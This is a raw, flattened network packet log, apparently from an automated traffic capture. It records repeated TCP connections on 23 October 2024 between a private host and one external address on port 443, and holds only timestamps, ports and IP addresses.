                                                                                                                                                                                                            Oct 23, 2024 07:03:11.614777088 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:11.615236044 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:11.615252972 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:11.616914034 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:11.616928101 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.752507925 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.752612114 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.752615929 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.752684116 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.753978014 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.753998041 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.770453930 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.770499945 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.770576954 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.782195091 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.782208920 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:13.666044950 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:13.666136026 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:13.666763067 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:13.666776896 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:13.668656111 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:13.668663025 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352518082 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352576971 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352724075 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352744102 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352744102 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352786064 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352883101 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352909088 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.362646103 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.362679005 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.362763882 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.362988949 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.363003016 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.274403095 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.274549007 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.275149107 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.275157928 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.282877922 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.282901049 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.971425056 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.971457005 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.971513987 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.971528053 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.971539974 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.971554995 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.971590042 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.972043037 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.972054958 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.983556032 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.983593941 CEST4434999395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.983654976 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.983896017 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.983906031 CEST4434999395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:16.883769989 CEST4434999395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:16.883941889 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:16.884310961 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:16.884320021 CEST4434999395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:16.885884047 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:16.885889053 CEST4434999395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:17.565288067 CEST4434999395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:17.565459967 CEST4434999395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:17.565509081 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:17.565684080 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:17.565684080 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:17.647325039 CEST49994443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:17.647361994 CEST4434999495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:17.647420883 CEST49994443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:17.647623062 CEST49994443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:17.647638083 CEST4434999495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:17.870702982 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:17.870737076 CEST4434999395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:18.571655035 CEST4434999495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:18.571787119 CEST49994443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:18.572407007 CEST49994443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:18.572419882 CEST4434999495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:18.574184895 CEST49994443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:18.574191093 CEST4434999495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:18.574242115 CEST49994443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:18.574259043 CEST4434999495.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:18.899764061 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:18.899811983 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:18.899903059 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:18.900177002 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:18.900192976 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:19.790426016 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:19.790589094 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:19.791063070 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:19.791078091 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:19.794130087 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:19.794137955 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.184473991 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.184540987 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.184585094 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.184701920 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.184745073 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.184771061 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.184806108 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.307475090 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.307528019 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.307559967 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.307579041 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.307602882 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.307625055 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.426471949 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.426497936 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.426594019 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.426609993 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.426651955 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.545485973 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.545557976 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.545630932 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.545659065 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.545701981 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.545725107 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.664694071 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.664764881 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.664984941 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.665018082 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.665072918 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.783669949 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.783739090 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.783803940 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.783817053 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.783874989 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.898036957 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.898102999 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.898123980 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.898145914 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.898196936 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.898215055 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.971952915 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.972018003 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.972069025 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.972088099 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.972115993 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:20.972143888 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.044872999 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.044908047 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.045098066 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.045110941 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.045160055 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.165955067 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.165987968 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.166117907 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.166143894 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.166186094 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.259298086 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.259332895 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.259602070 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.259635925 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.259692907 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.374003887 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.374133110 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.374226093 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.374258995 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.374281883 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.374320030 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.445053101 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.445131063 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.445312977 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.445327997 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.445378065 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.520418882 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.520447969 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.520499945 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.520515919 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.520553112 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.520577908 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.615928888 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.615962029 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.615999937 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.616010904 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.616033077 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.616048098 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.683372021 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.683450937 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.683491945 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.683511972 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.683530092 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.683567047 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.758533001 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.758599043 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.758652925 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.758662939 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.758677006 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.758697987 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.850614071 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.850645065 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.850702047 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.850714922 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.850744009 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.850769043 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.878071070 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.878123045 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.878195047 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.878195047 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.878207922 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.878254890 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.973438978 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.973491907 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.973566055 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.973603010 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.973623037 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.973644972 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.087841034 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.087898970 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.087991953 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.088009119 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.088051081 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.088074923 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.115118027 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.115173101 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.115221024 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.115236044 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.115258932 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.115281105 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.207248926 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.207338095 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.207355022 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.207387924 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.207417011 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.207429886 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.234463930 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.234540939 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.234616995 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.234636068 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.234667063 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.234683037 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.326524973 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.326582909 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.326647997 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.326670885 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.326700926 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.326744080 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.353249073 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.353298903 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.353349924 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.353365898 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.353391886 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.353409052 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.446222067 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.446264029 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.446325064 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.446336031 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.446361065 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.446382046 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.472875118 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.472898960 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.472980022 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.472989082 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.473022938 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.564209938 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.564284086 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.564321995 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.564332962 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.564376116 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.568053007 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.568098068 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.568131924 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.568140030 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.568162918 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.568180084 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.682794094 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.682821989 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.682914972 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.682925940 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.682965040 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.684899092 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.684920073 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.684973001 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.684981108 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.685017109 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.752334118 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.752398014 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.752438068 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.752449036 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.752487898 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.803355932 CEST4434999595.217.220.103192.168.2.6
